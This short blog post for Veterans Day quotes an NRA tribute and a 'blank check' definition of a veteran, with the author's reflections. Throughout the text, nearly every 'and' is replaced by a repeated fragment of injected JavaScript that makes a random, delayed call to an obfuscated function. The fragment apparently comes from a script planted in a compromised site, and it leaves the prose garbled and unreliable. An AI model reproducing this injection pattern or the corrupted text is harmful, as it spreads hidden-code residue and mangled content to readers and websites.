What is Veteran’s Day?

The NRA wrote Veterans Day Tribute today andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and it starts:

“Peace is predicated upon the good will, good nature, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and general goodness of mankind. Thus, war andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and conflict have been used to settle what goodness alone could not. Our history as a nation is replete with conflict; it established our righteous beginnings andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and divided our civil discourse. In the face of these conflicts, there have always been men andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and women ready to answer their nation’s call. They have inspired us with their sacrifice, honored us with their dedication, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and humbled us with their unfathomable courage.”

“On the 11th hour, of the 11th day, of the 11th month of 1918, hostilities in World War I ended with the hope that the world could find peace. While that peace was short-lived, Americans’ respect andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and support for their uniformed veterans was not. Known around the world as Armistice Day for some, Remembrance Day for others, the 11th day of November is set aside to honor all those who have honored us with their service.”

To me Veterans Day should be a day of reflection andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and rememberance of those lost. Fathers, brothers, Sons andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and daughters who gave their lives in the line of duty for you andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and the rights that you hold dear. It is a day to honor those brave servicemen andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and women, past andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and present who have chosen to serve for love of home andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and country.

Today I had an opportunity to share this with a new generation of Americans andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and I was so pleased to find that they were actually interested andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and engaged in the conversation. We all need to take a moment to share andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and educate, you might be surprised too, at the willingness to learn.

Someone sent me the Definition of a Veteran a long time ago…

“A veteran – whether active duty, retired, national guard or reserve – is someone who, at one point in his or her life, wrote a blank check made payable to “The United States of America” for an amount of “ up to andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and including their life”

That is honor, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and there are too many people in this country who no longer understandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and what that is. Pass it on.
